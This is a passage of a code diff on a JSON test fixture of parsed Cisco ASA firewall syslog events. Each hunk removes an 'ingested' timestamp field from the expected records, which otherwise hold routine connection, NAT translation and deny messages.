@@ -6281,7 +6203,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009097056Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6362,7 +6283,6 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009098043Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6367,6 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009099010Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", @@ -6529,7 +6448,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009099984Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6526,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009100996Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", 
@@ -6691,7 +6608,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009102026Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6688,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009103006Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6768,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009103976Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6934,7 +6848,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009104938Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +6928,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009147317Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7008,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009148859Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -7177,7 +7088,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009149844Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7168,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009150824Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7339,7 +7248,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009151810Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7328,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009152798Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7408,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009153854Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7488,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009154877Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -7663,7 +7568,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009155857Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7744,7 +7648,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009156820Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7726,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009157802Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7808,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009158805Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7886,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009159785Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +7970,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009160752Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", 
@@ -8153,7 +8052,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009161719Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8136,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009162685Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8217,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009163732Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8295,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009164710Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8377,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009165687Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", @@ -8561,7 +8455,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009166681Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", 
@@ -8647,7 +8540,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009167649Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8621,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009168610Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8699,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009169680Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8784,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009170885Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", @@ -8976,7 +8865,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009171865Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", 
@@ -9055,7 +8943,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009172830Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9028,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009173809Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9112,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009174776Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9193,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009175769Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", @@ -9387,7 +9271,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009176831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", 
@@ -9473,7 +9356,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009177831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9437,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009178873Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9515,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009179847Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9597,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009180814Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", @@ -9796,7 +9675,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009181787Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9757,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009182774Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", 
@@ -9958,7 +9835,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009183840Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +9917,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009184811Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +9995,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009185779Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", @@ -10206,7 +10080,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009186756Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10164,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009187737Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", 
@@ -10376,7 +10248,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009188720Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10329,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009189932Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10407,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009190956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", @@ -10620,7 +10489,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009191931Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10567,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009192909Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", 
@@ -10785,7 +10652,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.009193961Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -10867,7 +10733,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009195009Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291",
 "code": "305011",
 "kind": "event",
@@ -10946,7 +10811,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009195969Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)",
 "code": "302013",
 "kind": "event",
@@ -11032,7 +10896,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.009196952Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -11117,7 +10980,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.009197918Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -11200,7 +11062,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009198909Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -11283,7 +11144,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009199958Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292",
 "code": "305011",
 "kind": "event",
@@ -11362,7 +11222,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009200939Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)",
 "code": "302013",
 "kind": "event",
@@ -11447,7 +11306,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.009201904Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384",
 "code": "302016",
 "kind": "event",
@@ -11530,7 +11388,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009202866Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -11615,7 +11472,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.009203848Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94",
 "code": "302016",
 "kind": "event",
@@ -11697,7 +11553,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009204818Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293",
 "code": "305011",
 "kind": "event",
@@ -11776,7 +11631,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009206036Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)",
 "code": "302013",
 "kind": "event",
@@ -11862,7 +11716,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.009207008Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -11947,7 +11800,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.009207993Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -12030,7 +11882,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009208987Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -12115,7 +11966,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.009209956Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
 "code": "302016",
 "kind": "event",
@@ -12197,7 +12047,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009210994Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294",
 "code": "305011",
 "kind": "event",
@@ -12276,7 +12125,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009211966Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)",
 "code": "302013",
 "kind": "event",
@@ -12361,7 +12209,6 @@
 "event": {
 "severity": 6,
 "duration": 3526000000000,
- "ingested": "2021-12-29T09:58:07.009212938Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512",
 "code": "302016",
 "kind": "event",
@@ -12412,7 +12259,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009213912Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -12491,7 +12337,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009214886Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -12575,7 +12420,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009215893Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -12660,7 +12504,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.009216902Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168",
 "code": "302016",
 "kind": "event",
@@ -12743,7 +12586,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009217874Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -12828,7 +12670,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.009218874Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198",
 "code": "302016",
 "kind": "event",
@@ -12912,7 +12753,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.009219850Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150",
 "code": "302016",
 "kind": "event",
@@ -12995,7 +12835,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009220901Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -13080,7 +12919,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.009223512Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84",
